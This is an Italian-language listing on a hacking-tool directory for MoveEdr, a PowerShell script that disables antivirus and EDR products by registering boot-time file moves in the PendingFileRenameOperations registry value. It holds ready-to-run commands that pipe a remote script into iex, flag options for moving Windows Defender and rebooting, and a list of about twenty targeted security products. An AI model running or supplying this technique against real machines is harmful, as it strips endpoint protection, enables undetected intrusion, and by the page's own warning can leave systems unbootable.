Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/duhirsch/moveedr
Strumenti DifensiviEscalation di PrivilegiMeccanismi di PersistenzaEvasione IDS/IPSPost-ExploitPenetration TestingRed TeamingAnti-Bot
GitHubduhirsch/moveedr

MoveEdr

Disabilita permanentemente gli EDR come amministratore locale

Vedi Repository
129148 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

MoveEDR

Se sei amministratore puoi forzare Windows a eliminare o spostare cartelle e file subito dopo l'avvio, prima che i servizi vengano avviati. Questo può essere usato per disabilitare gli EDR.

Utilizzo

[!CAUTION] C'è un problema con CrowdStrike che provoca un bootloop con il messaggio "INACCESSIBLE_BOOT_DEVICE". La mia teoria è che CrowdStrike stesso o una soluzione di distribuzione software tenti di installare i file CrowdStrike mancanti, fallisca e lasci il sistema in uno stato instabile. Non sono sicuro se dipenda dal tempo trascorso dopo lo spostamento o dal numero di riavvii effettuati. Spostare CrowdStrike via per la prima volta e riavviare funziona correttamente. Magari pianifica l'undo dopo il primo riavvio, per prudenza.

root@kitploit:~
curl https://raw.githubusercontent.com/duhirsch/MoveEdr/refs/heads/main/MoveEdr.ps1 | iex; MoveEdr
# Reboot!

I seguenti flag sono disponibili

  • Undo : Annulla lo spostamento dell'EDR, funziona con CustomPaths
  • Clear: Cancella il valore della chiave di registro
  • Print: Stampa il valore della chiave di registro in un formato leggibile invece di stringhe terminate da byte nulli
  • CustomOnly: Per impostazione predefinita, CustomPaths e FullyCustomPaths vengono aggiunti agli spostamenti integrati. Questo flag garantisce che solo i tuoi percorsi personalizzati vengano spostati.
  • CustomPaths: Specifica i tuoi percorsi EDR invece di usare quelli integrati. Accetta solo origini come input; per personalizzare anche la destinazione usa FullyCustomPaths.
  • FullyCustomPaths : Specifica origini e destinazioni, dandoti il controllo sulla destinazione invece di usare un $Suffix.
  • Suffix: Usa un suffisso diverso per i file spostati invece del default _bak
  • Dump: Estrae i valori della chiave di registro in un formato utilizzabile con Load
  • Load: Carica i valori della chiave di registro precedentemente estratti
  • DefenderHard: Invece di spostare solo eseguibili selezionati di Windows Defender, sposta l'intera cartella Windows Defender
  • IgnoreOld: Non mantenere i valori già esistenti della chiave di registro, sovrascrivili ciecamente
  • Reboot: Esegue un riavvio immediatamente dopo l'impostazione della chiave di registro. Potrebbe eseguire Windows Updates e impiegare molto tempo per riavviarsi 😬

Esempio

root@kitploit:~
curl https://raw.githubusercontent.com/duhirsch/MoveEdr/refs/heads/main/MoveEdr.ps1 | iex
MoveEdr -CustomPaths "C:\Program Files\newAndShinyEdr","C:\Windows\System32\drivers\newAndShinyEdr" -Suffix "_x33f" -IgnoreOld -DefenderHard -Reboot

# Do what you need to do!

# Undo
# Same command as before, just append -Undo
curl https://raw.githubusercontent.com/duhirsch/MoveEdr/refs/heads/main/MoveEdr.ps1 | iex
MoveEdr -CustomPaths "C:\Program Files\newAndShinyEdr","C:\Windows\System32\drivers\newAndShinyEdr" -Suffix "_x33f" -IgnoreOld -DefenderHard -Reboot -Undo

La storia completa

Alcuni programmi hanno una funzione che impedisce persino agli amministratori locali di disinstallarli o disabilitarli. Nella maggior parte dei casi si tratta di AV/EDR che ti richiedono una password di disattivazione, anche quando sei amministratore.

Ecco un trucco per disabilitarli spostando file e cartelle in modo che non possano essere avviati al prossimo avvio.

PendMoves di SysInternals fornisce movefile.exe che ha la seguente spiegazione:

Esistono diverse applicazioni, come service pack e hotfix, che devono sostituire un file in uso e non riescono a farlo. Windows fornisce quindi l'API MoveFileEx per rinominare o eliminare un file e consente al chiamante di specificare che l'operazione deve avvenire al successivo avvio del sistema, prima che i file vengano referenziati. Session Manager esegue questa operazione leggendo i comandi di rinomina ed eliminazione registrati dal valore HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations.

Come fa esattamente MoveFileEx? Controlliamo la documentazione:

La funzione memorizza le posizioni dei file da rinominare al riavvio nel seguente valore di registro: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations

Questo valore di registro è di tipo REG_MULTI_SZ. Ogni operazione di rinomina memorizza una delle seguenti stringhe terminate da NULL, a seconda che la rinomina sia un'eliminazione o meno:

szSrcFile\0\0
szSrcFile\0szDstFile\0

Ciò significa che possiamo ottenere lo stesso effetto di movefile.exe creando la chiave di registro PendingFileRenameOperations e inserendo i percorsi dei file/directory che vogliamo eliminare nel corretto formato REG_MULTI_SZ.

Lo script MoveEdr automatizza la creazione delle chiavi di registro corrette per i seguenti AV/EDR:

  • Bitdefender
  • Blackberry Cylance
  • Checkpoint
  • Cisco
  • CrowdStrike
  • Cyberreason
  • Elastic
  • Fortinet
  • Kaspersky
  • Malwarebytes
  • McAfee (grazie a mschillinger)
  • Palo Alto Cortex
  • Sentinel One
  • Symantec
  • Trellix (precedentemente FireEye, grazie a @0x48756773)
  • Trend Micro Security Agent
Scarica lo strumento
  • VMware Carbon Black
  • Webroot
  • Windows Defender
  • Windows Defender for Endpoint